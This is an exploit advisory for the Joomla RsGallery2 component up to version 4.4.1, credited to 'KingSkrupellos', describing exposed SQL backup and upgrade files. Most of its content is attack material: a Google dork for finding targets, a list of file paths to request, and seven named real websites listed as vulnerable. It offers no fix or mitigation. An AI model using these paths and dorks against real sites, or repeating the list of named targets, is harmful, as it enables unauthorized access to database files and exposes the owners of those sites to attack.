Joomla RsGallery2 4.4.1 Database Disclosure

`#################################################################################################  
  
# Exploit Title : Joomla Com_RsGallery2 Components 4.4.1 Database Backup  
Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 08/12/2018  
# Vendor Homepage : rsgallery2.org ~  
extensions.joomla.org/extension/rsgallery2/  
# Software Download Link : rsgallery2.org/index.php/download  
+  
github.com/RSGallery2/RSGallery2_Component/releases/download/Version_4.4.1/RSGallery2_Component.4.4.1.zip  
+ github.com/RSGallery2/RSGallery2_Component/releases  
+  
github.com/DimaSamodurov/erasvit/blob/master/administrator/components/com_rsgallery2/sql/rsgallery2.sql  
+  
github.com/DimaSamodurov/erasvit/tree/master/administrator/components/com_rsgallery2  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.11 ~ 4.4.1 ~ 4.2.101 ~ 4.2.102 ~ 4.2.103 ~ 4.3.0  
~  
4.3.1 alpha ~ 4.3.1 ~ 4.4.1 alpha + 4.4.1 beta ~ 4.4.1_beta 2  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/administrator/components/com_rsgallery2/''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/administrator  
  
# Exploit :  
  
/administrator/components/com_rsgallery2/sql/rsgallery2.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.10.14_to_1.11.0.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.11.0_to_1.11.1.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.11.10_to_1.11.11.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.11.11_to_1.12.0.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.12.1_to_1.12.2.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.12.2_to_1.13.2.sql  
  
/administrator/components/com_rsgallery2/sql/upgrade_1.13.2_to_1.14.0.sql  
  
/administrator/sql/updates/mysql/3.0.0.sql  
  
/administrator/sql/updates/mysql/4.0.0.sql  
  
/administrator/sql/updates/mysql/4.3.0.sql  
  
/administrator/sql/updates/install.mysql.utf8.sql  
  
/administrator/sql/updates/uninstall.mysql.utf8.sql  
  
#################################################################################################  
  
# Example Vulnerable Site =>  
  
[+] itsi.co.id/administrator/components/com_rsgallery2/sql/rsgallery2.sql  
  
[+]  
theglen.ca/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql  
  
[+]  
airnews.co.za/home/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql  
  
[+]  
osmiebkk.moe.go.th/2-administrator/components/com_rsgallery2/sql/rsgallery2.sql  
  
[+]  
bunker.linkbg.com/polifron/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql  
  
[+]  
protech-me.com/httpdocs/administrator/components/com_rsgallery2/sql/rsgallery2.sql  
  
[+]  
wohnbautreppen.com/treppen/administrator/components/com_rsgallery2/sql/rsgallery2.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`